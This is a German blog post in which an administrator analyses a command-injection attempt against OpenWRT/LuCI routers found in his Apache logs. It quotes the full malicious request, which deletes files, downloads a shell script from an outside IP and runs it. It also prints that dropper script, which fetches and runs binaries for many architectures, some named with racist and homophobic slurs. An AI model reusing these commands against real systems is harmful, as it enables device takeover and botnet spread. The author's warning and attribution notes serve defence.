Bei einer Durchsicht meiner Logfiles habe ich zahlreiche Zugriffsversuche wie diesen bemerkt:
/var/log/apache2/home.fastix.org_access.log: 80.94.92.60 - - [15/May/2024:07:56:15 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F94.156.8.244%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1" 404 4167 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246"
Das Skript „/cgi-bin/luci/“ scheint zu OpenWRT zu gehören und ohne Authentifizierung nicht nur eine (vorliegend vom Angreifer vorgegebene) Datei aus dem Web zu laden, sondern auch auszuführen.
Ich habe das Skript tenda.sh mal herunter geladen (Von den gebrauchten Wörtern distanziere ich mich)):
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O lol
http://94.156.8.244/mips; chmod +x lol; ./lol tplink
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O lmao
http://94.156.8.244/mpsl; chmod +x lmao; ./lmao tplink
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O faggot
http://94.156.8.244/x86_64; chmod +x faggot; ./faggot tplink
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O gay
http://94.156.8.244/arm; chmod +x gay; ./gay tplink
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O retard
http://94.156.8.244/arm5; chmod +x retard; ./retard tplink
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O nigger
http://94.156.8.244/arm6; chmod +x nigger; ./nigger tplink
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O shit
http://94.156.8.244/arm7; chmod +x shit; ./shit tplink
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O nigga
http://94.156.8.244/i586; chmod +x nigga; ./nigga tplink
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O kekw
http://94.156.8.244/i686; chmod +x kekw; ./kekw tplink
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O what
http://94.156.8.244/powerpc; chmod +x what; ./what tplink
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O kys
http://94.156.8.244/sh4; chmod +x kys; ./kys tplink
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O shiteater
http://94.156.8.244/m68k; chmod +x shiteater; ./shiteater tplink
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O blyat
http://94.156.8.244/sparc; chmod +x blyat; ./blyat tplink
Hm. Das es ein Angriff ist, ist klar. Die IP 94.156.8.244 gehört laut den Whois-Daten zu einer SilentConnectionLtd in Bulgarien, die IP 80.94.92.60 zu einem Serveranbieter, der sich selbst sorgfältig zu verstecken versucht... Die Wortwahl im Skript „tenda.sh“ verweist auf einen homosexuellen Nazi, der sich wohl etwas großes in der Hinterpforte wünscht. Dem „faggot“ nach will er danach noch daran... lassen wir das.
Betroffen sind scheinbar Nutzer von OpenWRT und/oder TPLINK-Routern. Diese sollten dafür Sorge tragen, dass die Router nicht aus dem Web erreichbar sind. Auch nicht aus dem eigenem Netz, denn solche Links sind schnell per Mail & Co. untergeschoben.
Fortinet hat das ebenfalls untersucht...
Eine Anmerkung noch: Auch wenn es bereits Updates gab: Mein Vertrauen in die Fähigen desjenigen, der das „luci“-Skript geschrieben hat, läge auf dem Niveau des Vertrauens in „Luci-fer“.
Keine Kommentare:
Kommentar veröffentlichen